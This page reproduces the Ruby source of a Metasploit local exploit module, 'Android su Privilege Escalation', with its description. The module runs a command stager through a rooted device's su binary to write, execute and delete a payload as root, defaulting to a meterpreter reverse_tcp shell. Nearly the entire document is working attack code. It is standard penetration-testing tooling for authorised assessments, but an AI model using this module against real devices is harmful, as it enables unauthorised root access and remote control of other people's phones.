This Metasploit module uses the su binary present on rooted devices to run a payload as root. A rooted Android device will contain a su binary (often linked with an application) that allows the user to run commands as root. This module will use the su binary to execute a command stager as root. The command stager will write a payload binary to a temporary directory, make it executable, execute it in the background, and finally delete the executable. On most devices the su binary will pop-up a prompt on the device asking the user for permission.
3d450f6a5cba9fcc277774bbb95abdb6
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = ManualRanking
include Msf::Exploit::CmdStager
include Msf::Post::File
include Msf::Post::Android::Priv
def initialize(info={})
super( update_info( info, {
'Name' => "Android 'su' Privilege Escalation",
'Description' => %q{
This module uses the su binary present on rooted devices to run
a payload as root.
A rooted Android device will contain a su binary (often linked with
an application) that allows the user to run commands as root.
This module will use the su binary to execute a command stager
as root. The command stager will write a payload binary to a
temporary directory, make it executable, execute it in the background,
and finally delete the executable.
On most devices the su binary will pop-up a prompt on the device
asking the user for permission.
},
'License' => MSF_LICENSE,
'DisclosureDate' => 'Aug 31 2017',
'SessionTypes' => [ 'meterpreter', 'shell' ],
'Platform' => [ 'android', 'linux' ],
'Arch' => [ ARCH_AARCH64, ARCH_ARMLE, ARCH_X86, ARCH_X64, ARCH_MIPSLE ],
'Targets' => [
['aarch64',{'Arch' => ARCH_AARCH64}],
['armle', {'Arch' => ARCH_ARMLE}],
['x86', {'Arch' => ARCH_X86}],
['x64', {'Arch' => ARCH_X64}],
['mipsle', {'Arch' => ARCH_MIPSLE}]
],
'DefaultOptions' => {
'PAYLOAD' => 'linux/aarch64/meterpreter/reverse_tcp',
'WfsDelay' => 5,
},
'DefaultTarget' => 0,
}
))
register_options([
OptString.new('SU_BINARY', [true, 'The su binary to execute to obtain root', 'su']),
OptString.new('WritableDir', [true, 'Writable directory', '/data/local/tmp/']),
])
end
def base_dir
datastore['WritableDir'].to_s
end
def su_bin
datastore['SU_BINARY'].to_s
end
def exploit
if is_root?
fail_with Failure::BadConfig, 'Session already has root privileges'
end
linemax = 4088 - su_bin.size
execute_cmdstager({
flavor: :echo,
enc_format: :octal,
prefix: '\\\\0',
temp: base_dir,
linemax: linemax,
background: true,
})
end
def execute_command(cmd, opts)
su_cmd = "#{su_bin} -c '#{cmd}'"
cmd_exec(su_cmd)
end
end